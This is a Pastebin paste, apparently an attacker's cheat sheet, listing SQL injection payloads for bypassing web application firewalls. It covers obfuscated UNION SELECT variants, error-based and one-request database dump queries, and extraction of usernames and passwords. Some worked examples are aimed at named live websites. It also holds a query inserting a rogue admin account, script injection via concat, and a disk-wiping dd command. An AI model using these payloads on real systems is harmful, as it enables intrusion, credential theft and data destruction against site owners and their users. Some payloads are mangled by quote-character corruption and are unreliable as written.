API tools faq
paste
Advertisement
Guest User

SQL Bypass

a guest
Feb 9th, 2019
122
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 36.90 KB | None | 0 0
raw download clone embed print report
  1. ============================
  2. === BYPASS WAF BY AKDK ===
  3. ============================
  4. --'- : +--+ / : -- - : --+- : /* : %60 : %23 : %22 : ;%00 :
  5. === ORDER+BY ===
  6. /*!ORDER BY*/
  7. /*!50000ORDER BY*/
  8. /**/ORDER/**/BY/**/
  9. /*!order*/+/*!by*/
  10. /*!50000ORDER*//**//*!50000BY*/
  11. /*!12345ORDER*/+/*!BY*/
  12.  
  13. === UNION+SELECT ===
  14. /*!UnIoN*/SeLecT+
  15. /*!union*/+/*!select*/
  16. union+/*!select*/
  17. uNiOn aLl sElEcT
  18. UNIunionON+SELselectECT
  19. /**/union/*!50000select*//**/
  20. 0%a0union%a0select%09
  21. %0Aunion%0Aselect%0A
  22. %55nion/**/%53elect
  23. /**/union/**/select/**/
  24. /**/uNIon/**/sEleCt/**/
  25. +%2F**/+Union/*!select*/
  26. /**//*!union*//**//*!select*//**/
  27. /*!uNIOn*/ /*!SelECt*/
  28. +union+distinct+select+
  29. +union+distinctROW+select+
  30. /*!00000Union*/ /*!00000Select*/
  31. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  32. %55nion %53elect
  33. %55nion(%53elect 1,2,3)-- -
  34. +union+distinct+select+
  35. +union+distinctROW+select+
  36. /**//*!12345UNION SELECT*//**/
  37. /**//*!50000UNION SELECT*//**/
  38. /**/UNION/**//*!50000SELECT*//**/
  39. /*!50000UniON SeLeCt*/
  40. union /*!50000%53elect*/
  41. + #?uNiOn + #?sEleCt
  42. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  43. /*!%55NiOn*/ /*!%53eLEct*/
  44. /*!u%6eion*/ /*!se%6cect*/
  45. +un/**/ion+se/**/lect
  46. uni%0bon+se%0blect
  47. %2f**%2funion%2f**%2fselect
  48. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  49. REVERSE(noinu)+REVERSE(tceles)
  50. /*--*/union/*--*/select/*--*/
  51. union (/*!/**/ SeleCT */ 1,2,3)
  52. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  53. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  54. %0A%09UNION%0CSELECT%10NULL%
  55. /*!union*//*--*//*!all*//*--*//*!select*/
  56. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  57. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  58. +UnIoN/*&a=*/SeLeCT/*&a=*/
  59. union+sel%0bect
  60. +uni*on+sel*ect+
  61. +#1q%0Aunion all#qa%0A#%0Aselect
  62. union(select (1),(2),(3),(4),(5))
  63. UNION(SELECT(column)FROM(table))
  64. %23akb%0AUnIOn%23akb%0ASeLecT+
  65. %23akb%0A%55nIOn%23akb%0A%53eLecT+
  66. union(select(1),2,3)
  67. union (select 1111,2222,3333)
  68. uNioN (/*!/**/ SeleCT */ 11)
  69. union (select 1111,2222,3333)
  70. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  71. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  72. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  73. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  74. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  75. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  76. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  77. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  78. /union\sselect/g
  79. /union\s+select/i
  80. /*!UnIoN*/SeLeCT
  81. +UnIoN/*&a=*/SeLeCT/*&a=*/
  82. +uni>on+sel>ect+
  83. +(UnIoN)+(SelECT)+
  84. +(UnI)(oN)+(SeL)(EcT)
  85. +�UnI�On�+'SeL�ECT�
  86. +uni on+sel ect+
  87. +/*!UnIoN*/+/*!SeLeCt*/+
  88. /*!u%6eion*/ /*!se%6cect*/
  89. uni%20union%20/*!select*/%20
  90. union%23aa%0Aselect
  91. /**/union/*!50000select*/
  92. /^.*union.*$/ /^.*select.*$/
  93. /*union*/union/*select*/select+
  94. /*uni X on*/union/*sel X ect*/
  95. +un/**/ion+sel/**/ect+
  96. +UnIOn%0d%0aSeleCt%0d%0a
  97. UNION/*&test=1*/SELECT/*&pwn=2*/
  98. un?<ion sel="">+un/**/ion+se/**/lect+
  99. +UNunionION+SEselectLECT+
  100. +uni%0bon+se%0blect+
  101. %252f%252a*/union%252f%252a /select%252f%252a*/
  102. /%2A%2A/union/%2A%2A/select/%2A%2A/
  103. %2f**%2funion%2f**%2fselect%2f**%2f
  104. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  105.  
  106. === concat() ===
  107. concat()
  108. CON%08CAT()
  109. CoNcAt()
  110. CoNcAt()
  111. %0AcOnCat()
  112. /**//*!12345cOnCat*/
  113. /*!50000cOnCat*/(/*!*/)
  114. unhex(hex(concat(table_name)))
  115. unhex(hex(/*!12345concat*/(table_name)))
  116. unhex(hex(/*!50000concat*/(table_name)))
  117.  
  118. === group_concat() ===
  119. /*!12345group_concat*/(/*!12345table_name*/)
  120. /*!50000group_concat*/(/*!50000table_name*/)
  121. /*!GrOuP_ConCaT*/()
  122. /*!12345GroUP_ConCat*/()
  123. /*!50000gRouP_cOnCaT*/()
  124. /*!50000Gr%6fuP_c%6fnCAT*/()
  125. /*!group_concat*/()
  126. gRoUp_cOnCAt()
  127. group_concat(/*!*/)
  128. group_concat(/*!12345table_name*/)
  129. group_concat(/*!50000table_name*/)
  130. /*!group_concat*/(/*!12345table_name*/)
  131. /*!group_concat*/(/*!50000table_name*/)
  132. unhex(hex(group_concat(table_name)))
  133. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  134. unhex(hex(/*!12345group_concat*/(table_name)))
  135. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  136. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  137. unhex(hex(/*!50000group_concat*/(table_name)))
  138. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  139. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  140. CONVERT(group_concat(table_name)+USING+latin1)
  141. CONVERT(group_concat(table_name)+USING+latin2)
  142. CONVERT(group_concat(table_name)+USING+latin3)
  143. CONVERT(group_concat(table_name)+USING+latin4)
  144. CONVERT(group_concat(table_name)+USING+latin5)
  145. convert(group_concat(table_name)+using+ascii)
  146. convert(group_concat(/*!table_name*/)+using+ascii)
  147. convert(group_concat(/*!12345table_name*/)+using+ascii)
  148. convert(group_concat(/*!50000table_name*/)+using+ascii)
  149.  
  150. === information_schema.tables ===
  151. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  152. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  153. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  154. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  155. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  156. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  157.  
  158. === Setelah Param ID Contoh id=1 +/*!and*/+1=0 ===
  159. +div+0
  160. Having+1=0
  161. +AND+1=0
  162. +/*!and*/+1=0
  163. and(1)=(0)
  164.  
  165. === Bypass error 505/timeout ===
  166. union(select+1)
  167. union%0bselect
  168. -gunakan %0b atau /**/
  169.  
  170. NB : Ketika -- atau --+- Tidak Bekerja, Maka Gunakan ;%00 Sebagai Penggantinya.
  171.  
  172. *************************************************************************************
  173.  
  174. String Injection method
  175.  
  176. --'- : +--+ / : -- - : --+- : /*
  177. ) order by 1-- -
  178.  
  179. ') order by 1-- -
  180.  
  181. ')order by 1%23%23
  182.  
  183. %')order by 1%23%23
  184.  
  185. Null' order by 100--+
  186.  
  187. Null' order by 9999--+
  188.  
  189. ')group by 99-- -
  190.  
  191. 'group by 119449-- -
  192.  
  193. 'group/**/by/**/99%23%23
  194.  
  195. union select ByPassing method
  196.  
  197. +union+distinct+select+
  198.  
  199. +union+distinctROW+select+
  200.  
  201. /**//*!12345UNION SELECT*//**/
  202.  
  203. /**//*!50000UNION SELECT*//**/
  204.  
  205. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  206.  
  207. +/*!u%6eion*/+/*!se%6cect*/+
  208.  
  209. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  210.  
  211. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  212.  
  213. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  214.  
  215. union /*!50000%53elect*/
  216.  
  217. %55nion %53elect
  218.  
  219. +--+Union+--+Select+--+
  220.  
  221. +UnIoN/*&a=*/SeLeCT/*&a=*/
  222.  
  223. id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
  224.  
  225. id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
  226.  
  227. UnIoN SeLeCt CoNcAt(version())--
  228.  
  229. uNiOn aLl sElEcT
  230.  
  231. uUNIONnion all sSELECTelect
  232.  
  233. ===================================================================================================================================
  234. :: Buffer Overflow ::
  235. ===================================================================================================================================
  236. +And(select 1)=(select 0×414)+union+select+1–
  237.  
  238. +And(select 1)=(select 0xAAAA)+union+select+1–
  239.  
  240. +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141)+
  241.  
  242. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  243.  
  244. ==================================================================================================================================
  245. :: 400 Bad Request ::
  246. ==================================================================================================================================
  247. –+%0A
  248.  
  249. union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –
  250.  
  251. ==================================================================================================================================
  252. null the parameter
  253. ==================================================================================================================================
  254. id=-1
  255.  
  256. id=null
  257.  
  258. id=1+and+false+
  259.  
  260. id=9999
  261.  
  262. id=1 and 0
  263.  
  264. id==1
  265.  
  266. id=(-1)
  267.  
  268. =======================================================================================================================================
  269. Group_Concat
  270. =======================================================================================================================================
  271. Group_Concat
  272.  
  273. group_concat()
  274.  
  275. /*!group_concat*/()
  276.  
  277. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  278.  
  279. group_concat(,0x3c62723e)
  280.  
  281. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
  282.  
  283. CoNcAt()
  284.  
  285. CONCAT(DISTINCT Version())
  286.  
  287. concat(,0x3a,)
  288.  
  289. concat%00()
  290.  
  291. %00CoNcAt()
  292.  
  293. /*!50000cOnCat*/(/*!Version()*/)
  294.  
  295. /*!50000cOnCat*/
  296.  
  297. /**//*!12345cOnCat*/(,0x3a,)
  298.  
  299. concat_ws()
  300.  
  301. concat(0x3a,,0x3c62723e)
  302.  
  303. /*!concat_ws(0x3a,)*/
  304.  
  305. concat_ws(0x3a3a3a,version()
  306.  
  307. CONCAT_WS(CHAR(32,58,32),version(),)
  308.  
  309. REVERSE(tacnoc)
  310.  
  311. binary(version())
  312.  
  313. uncompress(compress(version()))
  314.  
  315. aes_decrypt(aes_encrypt(version(),1),1)
  316.  
  317. ====================================================================================================================================
  318. To appear column numbr in page put after id
  319. ====================================================================================================================================
  320. id=1+and+1=0+union+select+1,2,3,4,5,6
  321.  
  322. +AND+1=0
  323.  
  324. /*!aND*/ 1 like 0
  325.  
  326. +/*!and*/+1=0
  327.  
  328. +and+2>3+
  329.  
  330. +and(1)=(0)
  331.  
  332. and (1)!=(0)
  333.  
  334. +div+0
  335.  
  336. Having+1=0
  337.  
  338. ===================================================================================================================================
  339. function ByPassing
  340. ===================================================================================================================================
  341. unhex(hex(value))
  342.  
  343. cast(value as char)
  344.  
  345. uncompress(compress(version()))
  346.  
  347. cast(version() as char)
  348.  
  349. aes_decrypt(aes_encrypt(version(),1),1)
  350.  
  351. binary(version())
  352.  
  353. convert(value using ascii)
  354.  
  355. ===================================================================================================================================
  356. avoid source page injection
  357. ===================================================================================================================================
  358. concat(?”>,<br><br><br>,@@version,?<img src=”,?<?’#)
  359.  
  360. “><br>? <img src=”
  361.  
  362. <img src=””/>injection<img src=”
  363.  
  364. concat(0x223e,@@version)
  365.  
  366. concat(0x273e27,version(),0x3c212d2d)
  367.  
  368. concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
  369.  
  370. concat(0x223e,@@version,0x3c696d67207372633d22)
  371.  
  372. concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
  373.  
  374. concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
  375.  
  376. concat(‘</title>’,@@version,’<title>’)
  377.  
  378. concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
  379.  
  380. concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
  381.  
  382. ===================================================================================================================================
  383. get version – DB_NAME – user – HOST_NAME – datadir
  384. ===================================================================================================================================
  385. version()
  386.  
  387. convert(version() using latin1)
  388.  
  389. unhex(hex(version()))
  390.  
  391. @@GLOBAL.VERSION
  392.  
  393. (substr(@@version,1,1)=5) :: 1 true 0 fals
  394.  
  395. # like #
  396.  
  397. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –
  398.  
  399. ==================================================================================================================================
  400. +and substring(version(),1,1)=4
  401.  
  402. +and substring(version(),1,1)=5
  403.  
  404. +and substring(version(),1,1)=9
  405.  
  406. +and substring(version(),1,1)=10
  407.  
  408. id=1 /*!50094aaaa*/ error
  409.  
  410. id=1 /*!50095aaaa*/ no error
  411.  
  412. id=1 /*!50096aaaa*/ error
  413.  
  414. # like # http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/
  415.  
  416. id=1 /*!40123 1=1*/–+- no error
  417.  
  418. id=1 /*!40122rrrr*/ no error
  419.  
  420. # like # http://www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
  421. =================================================================================================================================
  422. DB_NAME()
  423. =================================================================================================================================
  424. @@database
  425. database()
  426. id=vv()
  427. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 –
  428. http://www.marinaplast.com/page.php?id=vv()
  429. @@user
  430. user()
  431. user_name()
  432. system_user()
  433. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 –
  434.  
  435. HOST_NAME()
  436. @@hostname
  437. @@servername
  438. SERVERPROPERTY()
  439.  
  440. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 –
  441. @@datadir
  442. datadir()
  443. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 –
  444. ASPX
  445. and 1=0/@@version
  446. ‘ and 1=0/@@version;–
  447. ‘) and 1=@@version–
  448. and 1=0/user;–
  449.  
  450. Requested method
  451. [DUMP DB in 1 Request]
  452.  
  453. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  454.  
  455. (select(@) from (select (@:=0×00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
  456. ===================================================================================================================================
  457. [DUMP DB in 1 Request improve]
  458. ===================================================================================================================================
  459.  
  460. (select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
  461.  
  462. like
  463. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 –
  464. ===================================================================================================================================
  465. #2#
  466. ===================================================================================================================================
  467. method like DUMP DB in 1 Request
  468. ===================================================================================================================================
  469. concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1)))
  470. like
  471. http://www.mishnetorah.com/shop/details.php…(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a ,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21
  472. ===================================================================================================================================
  473. #3#
  474. ===================================================================================================================================
  475. databases
  476.  
  477. (select+count(schema_name) +from+information_schema.schemata)
  478.  
  479. # like #
  480. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 –
  481.  
  482. tables
  483. (select+count(table_name) +from+information_schema.tables)
  484. # like #
  485. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 –
  486.  
  487. columns
  488. (select+count(column_name) +from+information_schema.columns)
  489. # like #
  490. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 –
  491. ===================================================================================================================================
  492. #4#
  493. ===================================================================================================================================
  494. show the table with all her columns
  495.  
  496. CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
  497.  
  498. +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1–+
  499.  
  500. like
  501. http://www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1–+
  502. ===================================================================================================================================
  503. #5#WWWWWWWWWWWAAAAAAAAAAAAAAAAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
  504. ===================================================================================================================================
  505. feltered requested
  506.  
  507. # tables #
  508. group_concat(/*!table_name*/)
  509.  
  510. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
  511.  
  512. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
  513.  
  514. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -
  515. ===================================================================================================================================
  516. # columns #
  517. ===================================================================================================================================
  518. group_concat(/*!column_name*/)
  519.  
  520. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  521.  
  522. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  523.  
  524. /*!froM*/ table– -
  525. ===================================================================================================================================
  526. #6#
  527. ===================================================================================================================================
  528. bypass method
  529.  
  530. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
  531.  
  532. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
  533.  
  534. like
  535. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 –
  536. ===================================================================================================================================
  537. #7#
  538. ===================================================================================================================================
  539. bypass method
  540.  
  541. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
  542.  
  543. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  544.  
  545. like
  546. http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)–
  547.  
  548. ===================================================================================================================================
  549. [+] Union Select:
  550. ===================================================================================================================================
  551. union /*!select*/+
  552. union/**/select/**/
  553. /**/union/**/select/**/
  554. /**/union/*!50000select*/
  555. /**//*!12345UNION SELECT*//**/
  556. /**//*!50000UNION SELECT*//**/
  557. /**/uniUNIONon/**/selSELECTect/**/
  558. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  559. /**//*!union*//**//*!select*//**/
  560. /**/UNunionION/**/SELselectECT/**/
  561. /**//*UnIOn*//**//*SEleCt*//**/
  562. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  563. /**/UNunionION/**/all/**/SELselectECT/**/
  564. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  565. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  566. uni<on all sel<ect
  567. %20union%20/*!select*/%20
  568. union%23aa%0Aselect
  569. union+distinct+select+
  570. union+distinctROW+select+
  571. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  572. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  573. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  574. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  575. /*!u%6eion*/+/*!se%6cect*/+
  576. 1%’)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  577. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  578. union /*!50000%53elect*/
  579. +%2F**/+Union/*!select*/
  580. %55nion %53elect
  581. +–+Union+–+Select+–+
  582. +UnIoN/*&a=*/SeLeCT/*&a=*/
  583. uNiOn aLl sElEcT
  584. uUNIONnion all sSELECTelect
  585. union(select(1),2,3)
  586. union (select 1111,2222,3333)
  587. union (/*!/**/ SeleCT */ 11)
  588. %0A%09UNION%0CSELECT%10NULL%
  589. /*!union*//*–*//*!all*//*–*//*!select*/
  590. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  591. union+sel%0bect
  592. +uni*on+sel*ect+
  593. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  594. union(select (1),(2),(3),(4),(5))
  595. UNION(SELECT(column)FROM(table))
  596. id=1+’UnI”On’+’SeL”ECT’ <-MySQL only
  597. id=1+’UnI’||’on’+SeLeCT’ <-MSSQL only
  598. union select 1–+%0A,2–+%0A,3–+%0A etc ….
  599. ===================================================================================================================================
  600. [+] Buffer overflow:
  601. ===================================================================================================================================
  602. +And(select 1)=(select 0×414)+union+select+1–
  603. +And(select 1)=(select 0xAAAA)+union+select+1–
  604. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  605. +and (/*!select*/ 1)=(/*!select*/ 0×414)+
  606. +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414?1414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141414141414141414141414141414141414141414141414141414141414141414141414?141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 4141)+
  607. ===================================================================================================================================
  608. [+] Group Concat:
  609. ===================================================================================================================================
  610. Group_Concat
  611. group_concat()
  612. /*!group_concat*/()
  613. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  614. group_concat(,0x3c62723e)
  615. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29
  616. CoNcAt()
  617. CONCAT(DISTINCT Version())
  618. concat(,0x3a,)
  619. concat%00()
  620. %00CoNcAt()
  621. /*!50000cOnCat*/(/*!Version()*/)
  622. /*!50000cOnCat*/
  623. /**//*!12345cOnCat*/(,0x3a,)
  624. concat_ws()
  625. concat(0x3a,,0x3c62723e)
  626. /*!concat_ws(0x3a,)*/
  627. concat_ws(0x3a3a3a,version()
  628. CONCAT_WS(CHAR(32,58,32),version(),)
  629. ===================================================================================================================================
  630. ERORE BASED
  631. ===================================================================================================================================
  632. =21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–
  633.  
  634. Database
  635.  
  636. 21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  637.  
  638. Table_name
  639.  
  640. and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  641.  
  642. Columns
  643.  
  644. 21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  645.  
  646. extract date
  647.  
  648. http://www.aliqbalschools.org/index.php… and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  649.  
  650. Notice the limit function in the query
  651. A website can have more than 2 two databases, so increase the limit until you find all database names
  652. Example: limit 0,1 or limit 1,1 or limit 2,1
  653. ===================================================================================================================================
  654. Differences:
  655. Error Based Query for Database Extraction:
  656. ===================================================================================================================================
  657. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  658.  
  659. Double Query for Database Extraction:
  660.  
  661. and(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,cast(database() as char),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  662. information_schema.tables group by x)a) and 1=1
  663.  
  664. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  665. concat(0x7e,0×27,cast(schema_name as char),0×27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
  666. information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  667.  
  668. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  669. concat(0x7e,0×27,cast(table_name as char),0×27,0x7e) FROM information_schema.tables Where
  670. table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  671. information_schema.tables group by x)a) and 1
  672. ===================================================================================================================================
  673. WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+
  674. ===================================================================================================================================
  675.  
  676. Descarci orice linux live, bootezi dupa el si formatezi cu dd+urandom. De acolo nu mai recupereaza NIMENI ceva.
  677. Code: dd if=/dev/urandom of=/dev/sda bs=1M
  678.  
  679. I’d say using concat(0xY)
  680.  
  681. Y being ‘<script>alert(‘Text here’);</script>’ in hex
  682. union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e)
  683.  
  684. http://zerocoolhf.altervista.org/level2.php…
  685.  
  686. union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(’0x’, hex(‘users’)
  687.  
  688. =113′+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0×00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name,0x27293B3C2F7363726970743E))))x),3–+–
  689.  
  690. injection in sql database addd new user
  691. INSERT INTO admins (`name`,`password`,`email`) VALUES (‘unix’,'unixunix’,'unix_chro@yahoo.com’)
  692.  
  693. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  694.  
  695. CHALLENGES
  696.  
  697. Code:
  698. =(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(information_schema.columns)where(table_schema=database())and(table_name=0×7365637572697479))–+-
  699. =12+and+false/*!union*/ /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f6e7420636f6c6f723d626c75653e3c68323e706833776c,15 from information_schema.tables where table_schema=0x66616272697a696f5f636572697070 LiMit 0,1–
  700. =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security–
